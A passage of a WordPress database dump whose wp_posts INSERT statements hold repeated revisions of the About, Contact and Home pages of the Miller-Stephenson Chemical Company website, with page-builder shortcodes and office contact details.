INSERT INTO `wp_posts` VALUES (267, 1, '2016-08-17 01:21:36', '2016-08-17 01:21:36', '', 'Calendar Print Preview', '', 'inherit', 'open', 'closed', '', 'calendar-print-preview', '', '', '2016-08-17 01:21:36', '2016-08-17 01:21:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Calendar-Print-Preview.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (271, 1, '2016-08-17 02:50:09', '2016-08-17 02:50:09', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" image_size="medium" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:50:09', '2016-08-17 02:50:09', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (272, 1, '2016-08-17 02:50:27', '2016-08-17 02:50:27', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" image_size="small" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:50:27', '2016-08-17 02:50:27', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (273, 1, '2016-08-17 02:51:23', '2016-08-17 02:51:23', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. \r\nBut the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. \r\nMiller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:51:23', '2016-08-17 02:51:23', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (274, 1, '2016-08-17 02:52:03', '2016-08-17 02:52:03', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="207" drop_shadow="1" image_pull="60px"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:52:03', '2016-08-17 02:52:03', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (275, 1, '2016-08-17 02:53:17', '2016-08-17 02:53:17', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50" image_size="medium" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:53:17', '2016-08-17 02:53:17', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (276, 1, '2016-08-17 02:53:32', '2016-08-17 02:53:32', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:53:32', '2016-08-17 02:53:32', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (277, 1, '2016-08-17 02:53:55', '2016-08-17 02:53:55', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="210"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:53:55', '2016-08-17 02:53:55', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (278, 1, '2016-08-17 02:54:27', '2016-08-17 02:54:27', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="211"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="209"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:54:27', '2016-08-17 02:54:27', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (279, 1, '2016-08-17 02:55:16', '2016-08-17 02:55:16', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="29"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:55:16', '2016-08-17 02:55:16', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (280, 1, '2016-08-17 02:55:46', '2016-08-17 02:55:46', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="76"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:55:46', '2016-08-17 02:55:46', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (281, 1, '2016-08-17 02:56:06', '2016-08-17 02:56:06', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="76" image_size="thumbnail"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:56:06', '2016-08-17 02:56:06', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (282, 1, '2016-08-17 02:56:30', '2016-08-17 02:56:30', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\n\r\nProvides quality chemical products for a wide range of industries worldwide. We are committed to providing customers with superior customer service, delivery and technical support to ensure successful product applications. We maintain four facilities throughout the United States and Canada to ensure prompt service and delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Technical Service Department regarding your applications.\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="50" image_size="thumbnail" drop_shadow="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/1"]\r\n\r\n<h3>You are invited!</h3>\r\n\r\nMiller-Stephenson Chemical Company is situated in the midst of a wooded private wildlife preserve in Fairfield County, Connecticut. Down a short path from the building entrance, a springfed lake is stocked with rainbow trout and busy with the activities of the mallard ducks who have their home here. Canadian geese and the wood duck visit the lake and the well-stocked feeding stations during their annual migrations. Pheasant wander freely across the lawns and among the shrubbery. But the pride of the preserve is a herd of gentle English Fallow deer who roam the woods, yet are tame enough to nibble apple slices from children visitors. Miller-Stephenson invites our customers and friends to visit this preserve, a harmonious blend of nature and industry. The preserve is open to visitors during weekdays.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="247"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2016-08-17 02:56:30', '2016-08-17 02:56:30', '', 204, 'https://132.148.10.86/wordpress/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (283, 1, '2016-08-17 02:58:25', '2016-08-17 02:58:25', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n<h3>Global Offices</h3>Corporate Office\r\n55 Backus Ave.\r\nDanbury, CT 06810-7328\r\n203.743.4447 / 800.442.3424\r\nFax 203.791.8702\r\ne-mail: ctsales@mschem.com\r\n\r\nIllinois\r\n6348 Oakton St.\r\nMorton Grove, IL 60053\r\n847.966.2022 / 800.447.4866\r\nFax 847.966.8468 e-mail: ilsales@mschem.com\r\n\r\nCalifornia\r\n12261 Foothill Blvd.\r\nSylmar, CA 91342\r\n818.896.4714 / 800.771.8161\r\nFax 818.896.6086\r\ne-mail: casales@mschem.com\r\n\r\nCanada\r\n280 Belfield Road\r\nToronto, Ontario M9W 1H6\r\n800.307.2199\r\nFax 416.674.2987\r\ne-mail: canadasales@\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[map lat="41.373306" long="-73.492442" height="500px" color="#58728a" zoom="17"]\r\n\r\nMiller-Stephenson, Inc.\r\n55 Backus ave.\r\nDanbury, CT 06810-7328\r\n\r\n[/map]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-08-17 02:58:25', '2016-08-17 02:58:25', '', 120, 'https://132.148.10.86/wordpress/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (284, 1, '2016-08-17 03:00:52', '2016-08-17 03:00:52', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<BR>& SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY & CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-17 03:00:52', '2016-08-17 03:00:52', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (285, 1, '2016-08-17 03:03:45', '2016-08-17 03:03:45', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" 